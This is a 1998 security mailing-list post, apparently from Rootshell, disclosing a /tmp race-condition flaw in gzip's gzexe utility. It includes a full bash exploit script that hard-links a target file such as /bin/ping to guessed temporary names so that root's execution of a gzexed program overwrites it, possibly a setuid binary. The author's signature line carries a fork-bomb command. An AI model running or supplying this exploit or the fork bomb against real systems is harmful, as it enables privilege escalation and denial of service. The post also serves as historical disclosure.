[ http://www.rootshell.com/ - 1/28/98 ] 01. GZEXE exploit ----------------- The following is courtesy Micha³ Zalewski ** DESCRIPTION ** GZEXE, part of gzip package, is a small utility which allows 'transparent' compressio any kind of executables (just like pklite under ms-dos). Unfortunatelly, it may be extremally dangerous. Here's the shell script used to decompression: if /usr/bin/tail +$skip $0 | "/usr/bin"/gzip -cd > /tmp/gztmp$$; then... [...] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ /tmp/gztmp$$ ${1+"$@"}; res=$? ^^^^^^^^^^^^ Just look at this... An example of badly-written one ;) It's possible to overwrite any file (including SUIDs!) with code of gzexed executable when root executes it... Then, this unwanted suid may be easily exploited. It's also possible to enforce execution of OUR OWN code instead of gzexed program, just by choosing as a victim any file not owned by user running vunerable executables, but writable by him/her. This file (even setuid) may be freely modified by attacker... Whoops! ** EXPLOIT ** -- GZEXE EXPLOIT -- #!/bin/bash # GZEXE executables exploit (gzip 1.2.4) # by Michal Zalewski (lcamtuf@staszic.waw.pl) # --------------------------------------------- VICTIM=/bin/ping GZEXED=a.out # Note: to locate gzexed executables you may use this: # find / -type f -exec grep "/tmp/gztmp\\\$\\\$ \\\$" {} \; -print|cut -f 1 -d " " if [ ! -f $VICTIM ]; then echo "I can't find my victim ($VICTIM)..." exit 0 fi ORIG=`ls -l $VICTIM|awk '{print \$5}'` echo "GZEXE exploit launched against $VICTIM ($ORIG bytes)." renice +20 $PPID >&/dev/null cd /tmp touch $GZEXED while :; do START=`ps|awk '$6=="ps"{print $1}'` let START=START+100 let DO=START+100 while [ "$START" -lt "$DO" ]; do ln $VICTIM gztmp$START &>/dev/null let START=START+1 done sleep 10 rm -f gztmp* &>/dev/null NOWY=`ls -l $VICTIM|awk '{print \$5}'` if [ ! "$ORIG" = "$NOWY" ]; then echo "Done, my master." exit 0 fi done -- EOF -- It may be left in background, just like my gcc-exploit-2. Please verify vunerable executable filename (GZEXED - you may specify more than one file, separated by spaces). ** FIX ** DO NOT USE GZEXE TO COMPRESS EXECUTABLES. That's all, TMPDIR will NOT help in this case. _______________________________________________________________________ Michal Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl] Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deustch] =------- [ echo -e "while :;do \$0&\ndone">_;chmod +x _;./_ ] --------=